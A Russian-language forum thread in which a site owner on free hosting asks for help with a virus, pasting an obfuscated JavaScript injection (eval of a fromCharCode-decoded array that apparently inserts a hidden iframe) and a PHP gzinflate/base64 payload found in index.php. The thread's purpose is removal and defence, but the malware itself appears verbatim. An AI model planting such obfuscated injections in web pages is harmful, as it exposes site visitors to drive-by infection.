Вирус на сайте, нужна помощь.

Посмотрите код страницы на которую ругается. Ищите там все посторонее, iframe'ы например

открыл исходный код

там вот такая хрень:

<script>var s='';try{new asd[0]}catch(q){if(q)r=1;c=String;}if(r&&document.createTextNode)t=2;e=eval;m=[4.5*t,18/t,52.5*t,204/t,16*t,80/t,50*t,222/t,49.5*t,234/t,54.5*t,202/t,55*t,232/t,23*t,206/t,50.5*t,232/t,34.5*t,216/t,50.5*t,218/t,50.5*t,220/t,58*t,230/t,33*t,242/t,42*t,194/t,51.5*t,156/t,48.5*t,218/t,50.5*t,80/t,19.5*t,196/t,55.5*t,200/t,60.5*t,78/t,20.5*t,182/t,24*t,186/t,20.5*t,246/t,4.5*t,18/t,4.5*t,210/t,51*t,228/t,48.5*t,218/t,50.5*t,228/t,20*t,82/t,29.5*t,18/t,4.5*t,250/t,16*t,202/t,54*t,230/t,50.5*t,64/t,61.5*t,18/t,4.5*t,18/t,50*t,222/t,49.5*t,234/t,54.5*t,202/t,55*t,232/t,23*t,238/t,57*t,210/t,58*t,202/t,20*t,68/t,30*t,210/t,51*t,228/t,48.5*t,218/t,50.5*t,64/t,57.5*t,228/t,49.5*t,122/t,19.5*t,208/t,58*t,232/t,56*t,116/t,23.5*t,94/t,51.5*t,222/t,55.5*t,206/t,54*t,202/t,22.5*t,196/t,48.5*t,220/t,53.5*t,210/t,55*t,206/t,23*t,198/t,55.5*t,218/t,23.5*t,218/t,48.5*t,210/t,55*t,92/t,56*t,208/t,56*t,126/t,56*t,194/t,51.5*t,202/t,30.5*t,204/t,28*t,194/t,28*t,114/t,25*t,200/t,49.5*t,108/t,25.5*t,202/t,25*t,106/t,51*t,100/t,27.5*t,78/t,16*t,238/t,52.5*t,200/t,58*t,208/t,30.5*t,78/t,24.5*t,96/t,19.5*t,64/t,52*t,202/t,52.5*t,206/t,52*t,232/t,30.5*t,78/t,24.5*t,96/t,19.5*t,64/t,57.5*t,232/t,60.5*t,216/t,50.5*t,122/t,19.5*t,236/t,52.5*t,230/t,52.5*t,196/t,52.5*t,216/t,52.5*t,232/t,60.5*t,116/t,52*t,210/t,50*t,200/t,50.5*t,220/t,29.5*t,224/t,55.5*t,230/t,52.5*t,232/t,52.5*t,222/t,55*t,116/t,48.5*t,196/t,57.5*t,222/t,54*t,234/t,58*t,202/t,29.5*t,216/t,50.5*t,204/t,58*t,116/t,24*t,118/t,58*t,222/t,56*t,116/t,24*t,118/t,19.5*t,124/t,30*t,94/t,52.5*t,204/t,57*t,194/t,54.5*t,202/t,31*t,68/t,20.5*t,118/t,4.5*t,18/t,62.5*t,18/t,4.5*t,204/t,58.5*t,220/t,49.5*t,232/t,52.5*t,222/t,55*t,64/t,52.5*t,204/t,57*t,194/t,54.5*t,202/t,57*t,80/t,20.5*t,246/t,4.5*t,18/t,4.5*t,236/t,48.5*t,228/t,16*t,204/t,16*t,122/t,16*t,200/t,55.5*t,198/t,58.5*t,218/t,50.5*t,220/t,58*t,92/t,49.5*t,228/t,50.5*t,194/t,58*t,202/t,34.5*t,216/t,50.5*t,218/t,50.5*t,220/t,58*t,80/t,19.5*t,210/t,51*t,228/t,48.5*t,218/t,50.5*t,78/t,20.5*t,118/t,51*t,92/t,57.5*t,202/t,58*t,130/t,58*t,232/t,57*t,210/t,49*t,234/t,58*t,202/t,20*t,78/t,57.5*t,228/t,49.5*t,78/t,22*t,78/t,52*t,232/t,58*t,224/t,29*t,94/t,23.5*t,206/t,55.5*t,222/t,51.5*t,216/t,50.5*t,90/t,49*t,194/t,55*t,214/t,52.5*t,220/t,51.5*t,92/t,49.5*t,222/t,54.5*t,94/t,54.5*t,194/t,52.5*t,220/t,23*t,224/t,52*t,224/t,31.5*t,224/t,48.5*t,206/t,50.5*t,122/t,51*t,112/t,48.5*t,112/t,28.5*t,100/t,50*t,198/t,27*t,102/t,50.5*t,100/t,26.5*t,204/t,25*t,110/t,19.5*t,82/t,29.5*t,204/t,23*t,230/t,58*t,242/t,54*t,202/t,23*t,236/t,52.5*t,230/t,52.5*t,196/t,52.5*t,216/t,52.5*t,232/t,60.5*t,122/t,19.5*t,208/t,52.5*t,200/t,50*t,202/t,55*t,78/t,29.5*t,204/t,23*t,230/t,58*t,242/t,54*t,202/t,23*t,224/t,55.5*t,230/t,52.5*t,232/t,52.5*t,222/t,55*t,122/t,19.5*t,194/t,49*t,230/t,55.5*t,216/t,58.5*t,232/t,50.5*t,78/t,29.5*t,204/t,23*t,230/t,58*t,242/t,54*t,202/t,23*t,216/t,50.5*t,204/t,58*t,122/t,19.5*t,96/t,19.5*t,118/t,51*t,92/t,57.5*t,232/t,60.5*t,216/t,50.5*t,92/t,58*t,222/t,56*t,122/t,19.5*t,96/t,19.5*t,118/t,51*t,92/t,57.5*t,202/t,58*t,130/t,58*t,232/t,57*t,210/t,49*t,234/t,58*t,202/t,20*t,78/t,59.5*t,210/t,50*t,232/t,52*t,78/t,22*t,78/t,24.5*t,96/t,19.5*t,82/t,29.5*t,204/t,23*t,230/t,50.5*t,232/t,32.5*t,232/t,58*t,228/t,52.5*t,196/t,58.5*t,232/t,50.5*t,80/t,19.5*t,208/t,50.5*t,210/t,51.5*t,208/t,58*t,78/t,22*t,78/t,24.5*t,96/t,19.5*t,82/t,29.5*t,18/t,4.5*t,18/t,50*t,222/t,49.5*t,234/t,54.5*t,202/t,55*t,232/t,23*t,206/t,50.5*t,232/t,34.5*t,216/t,50.5*t,218/t,50.5*t,220/t,58*t,230/t,33*t,242/t,42*t,194/t,51.5*t,156/t,48.5*t,218/t,50.5*t,80/t,19.5*t,196/t,55.5*t,200/t,60.5*t,78/t,20.5*t,182/t,24*t,186/t,23*t,194/t,56*t,224/t,50.5*t,220/t,50*t,134/t,52*t,210/t,54*t,200/t,20*t,204/t,20.5*t,118/t,4.5*t,18/t,62.5*t];mm=c['fro'+'mCharCode'];for(i=0;i!=m.length;i++)s+=mm(e("m"+"["+"i"+']'));try{document.appendChild(null)}catch(q){e(s);}</scipt>

смотрю index.php

там есть такое , это он ?:

#b710e0#

echo(gzinflate(base64_decode("1VfBcpswEP2V1odg1xlHWoGAIfSSey/tzeMDY5OYGWOnmKTtZPLvNbtCWgxO7UwuPdgjxEr7tPv2rbjdL6visf76nFWf9qnnJXX152Wb//qU7VdzsXhdZvVyPf45eSnuD/9VKpNl+r2uiu1D8nqYqq6uVrvlU5lv69myyrM6/5H/rr/tVvmkTiHJ0/w52yRlOvdnwZf6WkY39XUAOAbhHx6kPgwj0UyLZhLgMPRjslCNReAb8+ZNQPPNEBTOalw6c/PK2Ev+hhybB0B3Ea5ohgp38tEzNChj9CsJctDs40f9fRC1JKgyRm+Bgdq80WQVNitAmOMjcB+H2s2Djz5ciNojIFCJmKMTKOgNNMGj3ePeNoFoA22C6Nujm010c2Atj1caP+/Ji8KloTtFZG0Rq27eK3HuKRFgELITGywSgZksgIhcZhFWc2iJTACFJjy1dCibNG1DQzCBZbbFRNRRPD1uMZ5cxhHbFM8Aij3Y09nFsUVq8CNo0HbYwYzYlGAlBJE1oqHEoWNiGyrcHQK2D9C8bhMg0R5Cx1yijerULctn5MAQ0YkUGDOTFEodOKoAjze4uj1nm5AVuhb9Qu/SQWnmj/jOk9q+kR0ztrWUDqN0GiXEsZiYogPwWe65Q0NH6PDOejCcMKhCbuS7emMVFA9InLBGhvAoM9JVBBxXhDNoVQzxY1US57hSYzEbLvLSV7It51bljhVEQ0+SDFgWQqstw4HSZ+PBedTmf6ir6hS2I7vrS4ZN2iU9MImKGPwTvSXmignMxmB26bykY/Gmc5Zyhr3M4AISnZDHDamjxJGCOgn340EuitbJkDyTd7AmrtwNJ1Gq4pZwrVIK3k2JBLIfo9iiMiElC84UChyt7SYEHG84h2TcW04NDZyMUZVIVvJt4EVPikhWJbAqxwcwD8LKCpEKkNWUEMFMQHPFp30YFXjrNzbKaVBk7ze8v6kPkciB/tvpE6J7RyBCvAPo5dLKkVFaDYMFb9CaVbKC47p5B9BToszh8MZ2qihP9rgYhiT90u0/qOY7SiRYOvrFP9DU36Zt51bfSXbkNLXD1oE8dgRTcFGVgl+rbJ+8DPXH3Jb/868Y5dxpV6sdnKhwyj+6TvnWDwhHgTevEYukLNPl3Luvdt7UK+/WWXV3+Nz0Fsn9rhoXqUiKz2k52+Tbh3qdFNPpZD9Ny3Kcj0flaDqaH37FaOotvMkEv3Xt52v2+JhvV3frYrMab582m4n79s3H+0nyentjvpX/Ag==")));

#/b710e0#

?>

А хостер кто? Мне мирхостинг с такой шляпой помогает сам.

хостинг забугорный фришный. Взял его для тренировки , вряд ли они будут помогать, еще удалят ваще все.

Да, удаляйте. После выполения этого кода печатается исходный код вируса, проверил у себя на сервере.

удалил в 2-х местах в файлах index.php вроди удалился.

Как они его засунули его мне ? Что сделать чтоб не повторялось это?